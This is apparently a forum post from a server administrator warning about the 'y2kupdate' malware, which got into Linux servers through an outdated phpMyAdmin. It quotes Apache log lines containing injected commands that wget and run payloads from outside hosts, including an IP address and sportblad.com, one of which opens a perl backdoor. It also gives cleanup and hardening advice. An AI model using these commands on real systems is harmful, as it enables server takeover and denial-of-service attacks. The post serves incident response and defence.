I am posting here to warn others about y2kupdate.
I have experienced two denial of service attacks in the last two weeks as a result of this "application" and wished to warn others.
The entry point to install the software on the Linux servers was a vulnerabilty in an out of date version of phpMyAdmin.
The apache access_log entry which shows the initial infection taking place is shown below:
GET /admin/config/config.inc.php?c=uname%20-a
GET /admin/config/config.inc.php?c=cd%20/tmp;wget%20http://212.144.252.5/bh.tgz;tar%20xvf%20bh.tgz;rm%20-fr%20bh.tgz;cd%20.pid;./init;./fuck
An analysis of the last line of the above log entry reveals:
1) Vulnerability in phpMyAdmin exploited via /admin/config/config.inc.php
2) wget used to fetch bh.tgz into /tmp directory
3) bh.tgz unpacked into /tmp/.pid driectory and source archive deleted
4) init executable run from /tmp/.pid
5) f*** script run from /tmp/.pid
The init executable appears, amongst other things, to start a proxy server. This displaces httpd and listens on ports 80 and 443. The sign of this is that using the command netstat -lnpt shows that ports 80 and 443 are held open by the init or cron processes instead of httpd. Despite this the Web content on the server is available as normal, until an external trigger? puts init (or std?) into attack mode. At this point the server goes to 100% CPU time and spends it's whole time pushing out dos packets onto the intranet and internet. The only effective way of stopping this appears to be to reboot the server, at which point apache httpd takes back control of ports 80 and 443.
The f*** shell script starts a once a minute cron job as user apache, which calls the y2kupdate application. I have not yet worked out what this may be doing, although I suspect it may be trying to communicate with other servers over the Internet as there is a file called bang.txt in the .pid folder that contains a list of around 15K IP addresses. The easiest way to stop y2kupdate is to erase the apache cron job.
The above applications can be installed into three possible locations, /tmp, /var/tmp & /dev/shm and these should be checked for suspicious hidden directories/files. Once found it is important to delete the suspicious items.
It is also important to change the permissions (chmod 750) on /usr/bin/wget, /usr/bin/lwp-download and /usr/bin/curl so they can only be used by root to fetch files off the Internet. This is a precautionary measure as once someone has obtained access to a server via a PHP or Perl backdoor these three commands seem to be the main way of downloading unwanted applications.
Also of course it is vitally important to download the latest version of phpMyAdmin to close the vulnerability down.
Additionally there appears to be a second class of application that can expliot the phpMyAdmin vulnerability. This is a perl script, which goes by various names, including ize. This appears to allow a remote user shell command line access to the server as user Apache. Once again it can be found in /tmp, /var/tmp or /dev/shm.
An Apache log entry which shows this type of backdoor exploit is shown below:
GET /admin/config/config.inc.php?c=cd+/tmp;wget+sportblad.com/b.txt;perl+b.txt;rm+rf-+b.txt
For more information on these vulnerabilities please visit:
http://www.securityfocus.com/infocus/1871
